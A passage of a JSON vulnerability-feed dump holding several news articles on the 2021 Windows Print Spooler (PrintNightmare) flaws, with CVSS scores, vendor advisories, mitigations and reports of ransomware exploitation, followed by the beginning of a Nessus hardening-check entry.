the Windows Print Spooler service, possibly yet another zero-day flaw in the same component has come to light, making it the fourth printer-related shortcoming to be discovered in recent weeks.\n\n\"Microsoft Windows allows for non-admin users to be able to install printer drivers via Point and Print,\" CERT Coordination Center's Will Dormann [said](<https://kb.cert.org/vuls/id/131152>) in an advisory published Sunday. \"Printers installed via this technique also install queue-specific files, which can be arbitrary libraries to be loaded by the privileged Windows Print Spooler process.\"\n\nAn exploit for the vulnerability was disclosed by security researcher and [Mimikatz creator](<https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/>) [Benjamin Delpy](<https://twitter.com/gentilkiwi/status/1416079316673339392>).\n\n> [#printnightmare](<https://twitter.com/hashtag/printnightmare?src=hash&ref_src=twsrc%5Etfw>) \\- Episode 4 \n \nYou know what is better than a Legit Kiwi Printer ? \n\ud83e\udd5dAnother Legit Kiwi Printer...\ud83d\udc4d \n \nNo prerequiste at all, you even don't need to sign drivers/package\ud83e\udd2a [pic.twitter.com/oInb5jm3tE](<https://t.co/oInb5jm3tE>)\n> \n> \u2014 \ud83e\udd5d Benjamin Delpy (@gentilkiwi) [July 16, 2021](<https://twitter.com/gentilkiwi/status/1416079316673339392?ref_src=twsrc%5Etfw>)\n\nSpecifically, the flaw allows a threat actor to execute arbitrary code with SYSTEM privileges on a vulnerable Windows machine by connecting to a malicious print server under their control.\n\nWhile there is no solution to the problem, CERT/CC recommends configuring \"PackagePointAndPrintServerList\" to prevent the installation of printers from arbitrary servers and blocking outbound SMB traffic at the network boundary, given that public exploits for the vulnerability utilize SMB for connectivity to a malicious shared printer.\n\nThe new issue is only the latest evidence of the fallout after the [PrintNightmare](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>) flaw accidentally became public last month, leading to the discovery of a number of vulnerabilities affecting the Print Spooler service.\n\nGiven the lack of details surrounding [CVE-2021-34481](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) \u2014 the local privilege escalation (LPE) flaw reported by security researcher Jacob Baines \u2014 [it's not immediately clear](<https://twitter.com/wdormann/status/1416740343597486087>) what connection, if any, the vulnerability and this new Print Spooler signature-check bypass that also allows for LPE may have with one another.\n\nWhen reached for a response, a Microsoft spokesperson told The Hacker News that \"we are investigating reports and will take appropriate action as needed to help keep customers protected.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T06:51:00", "type": "thn", "title": "Researcher Uncovers Yet Another Unpatched Windows Printer Spooler Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2021-07-22T03:40:17", "id": "THN:C2D8045AAD8E4BA5A9168782138B6D52", "href": "https://thehackernews.com/2021/07/researcher-uncover-yet-another.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[](<https://thehackernews.com/images/-otyRXbM_lrE/YRSmPS71hoI/AAAAAAAADgQ/tTqtA8hUI7kXtRqLCssO2jaV1gRO-zUdACLcBGAsYHQ/s0/printer-hack.gif>)\n\nA day after releasing [Patch Tuesday updates](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>), Microsoft acknowledged yet another remote code execution vulnerability in the Windows Print Spooler component, adding that it's working to remediate the issue in an upcoming security update.\n\nTracked as [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (CVSS score: 7.3), the unpatched flaw is the latest to join a [list](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) of [bugs](<https://thehackernews.com/2021/07/researcher-uncover-yet-another.html>) collectively known as [PrintNightmare](<https://www.cnet.com/news/2021/08/microsoft-releases-windows-updates-to.html%20https://suppor>) that have plagued the printer service and come to light in recent months. Victor Mata of FusionX, Accenture Security, who has been credited with reporting the flaw, [said](<https://twitter.com/offenseindepth/status/1425574625384206339>) the issue was disclosed to Microsoft in December 2020.\n\n\"A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\" the company said in its out-of-band bulletin, echoing the vulnerability details for [CVE-2021-34481](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>). \"An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\n[](<https://thehackernews.com/images/-2GxRoKJtyWA/YRSwMjr9x2I/AAAAAAAADgY/_N1Bo0X9GrsWaOMamfoYSHTTfcM5ZJYbwCLcBGAsYHQ/s0/PRINTER.jpg>)\n\nIt's worth noting that the Windows maker has since released [updates](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) to change the default Point and Print default behavior, effectively barring non-administrator users from installing or updating new and existing printer drivers using drivers from a remote computer or server without first elevating themselves to an administrator.\n\nAs workarounds, Microsoft is recommending users to stop and disable the Print Spooler service to prevent malicious actors from exploiting the vulnerability. The CERT Coordination Center, in a [vulnerability note](<https://www.kb.cert.org/vuls/id/131152>), is also advising users to block outbound SMB traffic to prevent connecting to a malicious shared printer.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T05:23:00", "type": "thn", "title": "Microsoft Warns of Another Unpatched Windows Print Spooler RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36958"], "modified": "2021-08-12T06:19:03", "id": "THN:3F83D0C001F2A9046C61A56F5ABE7695", "href": "https://thehackernews.com/2021/08/microsoft-security-bulletin-warns-of.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:20", "description": "[](<https://thehackernews.com/images/-dWO_rqbdIfE/YPENEeXU5vI/AAAAAAAADNg/aAsoS9_8txQ842LEOAjpzJcvpkm6tro9wCLcBGAsYHQ/s0/Windows-Print-Spooler-Vulnerability.jpg>)\n\nMicrosoft on Thursday shared fresh guidance on yet another vulnerability affecting the Windows Print Spooler service, stating that it's working to address it in an upcoming security update.\n\nTracked as [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) (CVSS score: 7.8), the issue concerns a local privilege escalation flaw that could be abused to perform unauthorized actions on the system. The company credited security researcher Jacob Baines for discovering and reporting the bug.\n\n\"An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges,\" the Windows maker said in its advisory. \"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\nHowever, it's worth pointing out that successful exploitation of the vulnerability requires the attacker to have the ability to execute code on a victim system. In other words, this vulnerability can only be exploited locally to gain elevated privileges on a device.\n\n[](<https://thehackernews.com/images/-KUjZieTgFsk/YPENj7mkDHI/AAAAAAAADNo/7YO-HAzw4LQN5_eg5egoI8gP2YeP34pjwCLcBGAsYHQ/s0/hacking.jpg>)\n\nAs workarounds, Microsoft is recommending users to stop and disable the Print Spooler service to prevent malicious actors from exploiting the vulnerability.\n\nThe development comes days after the Redmond-based firm rolled out patches to address a critical shortcoming in the same component that it disclosed as being actively exploited to stage in-the-wild attacks, making it the third printer-related flaw to come to light in recent weeks.\n\nDubbed PrintNightmare ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>)), the vulnerability stems from a missing permission check in the Print Spooler that enables the installation of malicious print drivers to achieve remote code execution or local privilege escalation on vulnerable systems.\n\nHowever, it later emerged that the out-of-band security update could be entirely bypassed under specific conditions to gain both local privilege escalation and remote code execution. Microsoft has since said the fixes are \"working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-16T04:40:00", "type": "thn", "title": "Microsoft Warns of New Unpatched Windows Print Spooler Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-34527"], "modified": "2021-07-17T11:53:08", "id": "THN:CF5E93184467C7B8F56A517CE724ABCF", "href": "https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:54", "description": "[](<https://thehackernews.com/images/-hJTm9-cqglY/YNxU5_qFPTI/AAAAAAAADCE/M7b8MDQXSLEIfe1qnm26-N908L-atUbsQCLcBGAsYHQ/s0/windows-hacking.jpg>)\n\nA proof-of-concept (PoC) exploit related to a remote code execution vulnerability affecting Windows Print Spooler and patched by Microsoft earlier this month was briefly published online before being taken down.\n\nIdentified as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), the security issue could grant remote attackers full control of vulnerable systems. [Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler>) manages the printing process in Windows, including loading the appropriate printer drivers and scheduling the print job for printing, among others.\n\nPrint Spooler flaws are concerning, not least because of the wide attack surface, but also owing to the fact that it runs at the highest privilege level and is capable of dynamically loading third-party binaries.\n\nThe Windows maker addressed the vulnerability as part of its [Patch Tuesday](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) update on June 8, 2021. But almost two weeks later, Microsoft revised the flaw's impact from an elevation of privilege to remote code execution (RCE) as well as upgraded the severity level from Important to Critical.\n\n\"Either the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or remotely (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., tricking a legitimate user into opening a malicious document),\" Microsoft said in its advisory.\n\nThings took a turn when Chinese security firm QiAnXin earlier this week [disclosed](<https://twitter.com/RedDrip7/status/1409353110187757575>) it was able to find the \"right approaches\" to leverage the flaw, thereby demonstrating a successful exploitation to achieve RCE.\n\nAlthough the researchers refrained from sharing additional technical specifics, Hong Kong-based cybersecurity company Sangfor published what's an independent deep-dive of the same vulnerability to GitHub, along with a fully working PoC code, where it remained publicly accessible before it was taken offline a few hours later.\n\nSangfor codenamed the vulnerability \"PrintNightmare.\"\n\n\"We deleted the PoC of PrintNightmare. To mitigate this vulnerability, please update Windows to the latest version, or disable the Spooler service,\" [tweeted](<https://twitter.com/edwardzpeng/status/1409810304091889669>) Sangfor's Principal Security Researcher Zhiniang Peng. The findings are expected to be [presented](<https://www.blackhat.com/us-21/briefings/schedule/#diving-in-to-spooler-discovering-lpe-and-rce-vulnerabilities-in-windows-printer-23315>) at the Black Hat USA conference next month.\n\nWindows Print Spooler has long been a source of security vulnerabilities, with Microsoft fixing at least three issues \u2014 [CVE-2020-1048](<https://www.blackhat.com/us-20/briefings/schedule/index.html#a-decade-after-stuxnets-printer-vulnerability-printing-is-still-the-stairway-to-heaven-19685>), [CVE-2020-1300](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1300>), and [CVE-2020-1337](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337>) \u2014 in the past year alone. Notably, a flaw in the service was also abused to gain remote access and propagate the [Stuxnet](<https://en.wikipedia.org/wiki/Stuxnet>) worm in 2010 targeting Iranian nuclear installations.\n\n_**Update **_**_\u2014_** There are now indications that the fix released by Microsoft for the critical remote code execution vulnerability in the Windows Print spooler service in June does not completely remediate the root cause of the bug, according to the CERT Coordination Center, raising the possibility that it's a zero-day flaw in need of a patch.\n\n\"While Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does not address the public exploits that also identify as CVE-2021-1675,\" CERT/CC's Will Dormann [said](<https://twitter.com/wdormann/status/1410198834970599425>) in a [vulnerability note](<https://kb.cert.org/vuls/id/383432>) published Wednesday.\n\nIt's worth noting that the successful exploitation of CVE-2021-1675 could open the door to complete system takeover by remote adversaries. We have reached out to Microsoft for comment, and we will update the story when we hear back.\n\nIn light of the latest disclosure, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) is [recommending](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) that administrators \"disable the Windows Print spooler service in Domain Controllers and systems that do not print.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-30T11:28:00", "type": "thn", "title": "Researchers Leak PoC Exploit for a Critical Windows RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2021-1675"], "modified": "2021-07-02T04:15:41", "id": "THN:EDD5C9F076596EB9D13D36268BDBFAD1", "href": "https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:15", "description": "[](<https://thehackernews.com/images/-KFVbzvrTdtw/YRNbSwawxnI/AAAAAAAADfg/bEuoCVHmHHw4ycTXfnhAqcyuUoWDf2W7gCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft on Tuesday rolled out [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Aug>) to address a total of 44 security issues affecting its software products and services, one of which it says is an actively exploited zero-day in the wild.\n\nThe update, which is the smallest release since December 2019, squashes seven Critical and 37 Important bugs in Windows, .NET Core & Visual Studio, Azure, Microsoft Graphics Component, Microsoft Office, Microsoft Scripting Engine, Microsoft Windows Codecs Library, Remote Desktop Client, among others. This is in addition to [seven security flaws](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) it patched in the Microsoft Edge browser on August 5.\n\nChief among the patched issues is [CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>) (CVSS score: 7.8), an elevation of privilege flaw affecting Windows Update Medic Service \u2014 a service that enables remediation and protection of Windows Update components \u2014 which could be abused to run malicious programs with escalated permissions.\n\nMicrosoft's Threat Intelligence Center has been credited with reporting the flaw, although the company refrained from sharing additional specifics or detail on how widespread those attacks were in light of active exploitation attempts.\n\nTwo of the security vulnerabilities are publicly known at the time of release -\n\n * [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>) (CVSS score: 9.8) - Windows LSA Spoofing Vulnerability\n * [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36936>) (CVSS score: 8.8) - Windows Print Spooler Remote Code Execution Vulnerability\n\nWhile CVE-2021-36942 contains fixes to secure systems against NTLM relay attacks like [PetitPotam](<https://thehackernews.com/2021/07/new-petitpotam-ntlm-relay-attack-lets.html>) by blocking the LSARPC interface, CVE-2021-36936 resolves yet another remote code execution flaw in the Windows Print Spooler component.\n\n\"An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate against another server using NTLM,\" Microsoft said in its advisory for CVE-2021-36942; adding the \"security update blocks the affected API calls OpenEncryptedFileRawA and OpenEncryptedFileRawW through LSARPC interface.\"\n\nCVE-2021-36936 is also one among the three flaws in the Print Spooler service that Microsoft has fixed this month, with the two other vulnerabilities being [CVE-2021-36947](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36947>) and (CVSS score: 8.2) and [CVE-2021-34483](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34483>) (CVSS score: 7.8), the latter of which concerns an elevation of privilege vulnerability.\n\nIn addition, Microsoft has released [security updates](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) to resolve a previously disclosed remote code execution in the Print Spooler service tracked as [CVE-2021-34481](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) (CVSS score: 8.8). This changes the default behavior of the \"[Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>)\" feature, effectively preventing non-administrator users from installing or updating new and existing printer drivers using drivers from a remote computer or server without first elevating themselves to an administrator.\n\nAnother critical flaw remediated as part of Patch Tuesday updates is [CVE-2021-26424](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26424>) (CVSS score: 9.9), a remote code execution vulnerability in Windows TCP/IP, which Microsoft notes \"is remotely triggerable by a malicious Hyper-V guest sending an ipv6 ping to the Hyper-V host. An attacker could send a specially crafted TCP/IP packet to its host utilizing the TCP/IP Protocol Stack (tcpip.sys) to process packets.\"\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nBesides Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including -\n\n * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-08-01>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Juniper Networks](<https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-August/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T05:31:00", "type": "thn", "title": "Microsoft Releases Windows Updates to Patch Actively Exploited Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-36936", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2021-08-11T05:31:39", "id": "THN:F601EBBE359B3547B8E79F0217562FEF", "href": "https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[](<https://thehackernews.com/images/-YB6xMmNkBp0/YRYuIvxMidI/AAAAAAAADhg/a2Ee5QkoQZw6JlnYhCIdg3Nk-HM2yu2wwCLcBGAsYHQ/s0/ransomware.jpg>)\n\nRansomware operators such as Magniber and Vice Society are actively exploiting vulnerabilities in Windows Print Spooler to compromise victims and spread laterally across a victim's network to deploy file-encrypting payloads on targeted systems.\n\n\"Multiple, distinct threat actors view this vulnerability as attractive to use during their attacks and may indicate that this vulnerability will continue to see more widespread adoption and incorporation by various adversaries moving forward,\" Cisco Talos [said](<https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html>) in a report published Thursday, corroborating an [independent analysis](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) from CrowdStrike, which observed instances of Magniber ransomware infections targeting entities in South Korea.\n\nWhile Magniber ransomware was first spotted in late 2017 singling out victims in South Korea through malvertising campaigns, Vice Society is a new entrant that emerged on the ransomware landscape in mid-2021, primarily targeting public school districts and other educational institutions. The attacks are said to have taken place since at least July 13.\n\nSince June, a series of \"PrintNightmare\" issues affecting the Windows print spooler service has come to light that could enable remote code execution when the component performs privileged file operations -\n\n * [**CVE-2021-1675**](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on June 8)\n * [**CVE-2021-34527**](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on July 6-7)\n * [**CVE-2021-34481**](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)\n * [**CVE-2021-36936**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10) \n * [**CVE-2021-36947**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)\n * [**CVE-2021-34483**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Elevation of Privilege Vulnerability (Patched on August 10)\n * [**CVE-2021-36958**](<https://thehackernews.com/2021/08/microsoft-security-bulletin-warns-of.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Unpatched)\n\nCrowdStrike noted it was able to successfully prevent attempts made by the Magniber ransomware gang at exploiting the PrintNightmare vulnerability.\n\nVice Society, on the other hand, leveraged a variety of techniques to conduct post-compromise discovery and reconnaissance prior to bypassing native Windows protections for credential theft and privilege escalation.\n\n[](<https://thehackernews.com/images/-JlsTWIHVgX4/YRYltMOGBKI/AAAAAAAADhQ/pzUFIcW6y0ABjOe3PuUQE5cPSnEOvGP9ACLcBGAsYHQ/s0/ransomware.jpg>)\n\nSpecifically, the attacker is believed to have used a malicious library associated with the PrintNightmare flaw (CVE-2021-34527) to pivot to multiple systems across the environment and extract credentials from the victim.\n\n\"Adversaries are constantly refining their approach to the ransomware attack lifecycle as they strive to operate more effectively, efficiently, and evasively,\" the researchers said. \"The use of the vulnerability known as PrintNightmare shows that adversaries are paying close attention and will quickly incorporate new tools that they find useful for various purposes during their attacks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-13T08:29:00", "type": "thn", "title": "Ransomware Gangs Exploiting Windows Print Spooler Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34527", "CVE-2021-36936", "CVE-2021-36947", "CVE-2021-36958"], "modified": "2021-08-13T08:32:51", "id": "THN:6428957E9DED493169A2E63839F98667", "href": "https://thehackernews.com/2021/08/ransomware-gangs-exploiting-windows.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-12T03:43:11", "description": "The remote system may be in a vulnerable state to exploitation by having the HKLM\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\RestrictDriverInstallationToAdministrators registry key set to 0.", "cvss3": {}, "published": "2022-02-22T00:00:00", "type": "nessus", "title": "Windows Operating System Hardening Measure (RestrictDriverInstallationToAdministrators)", 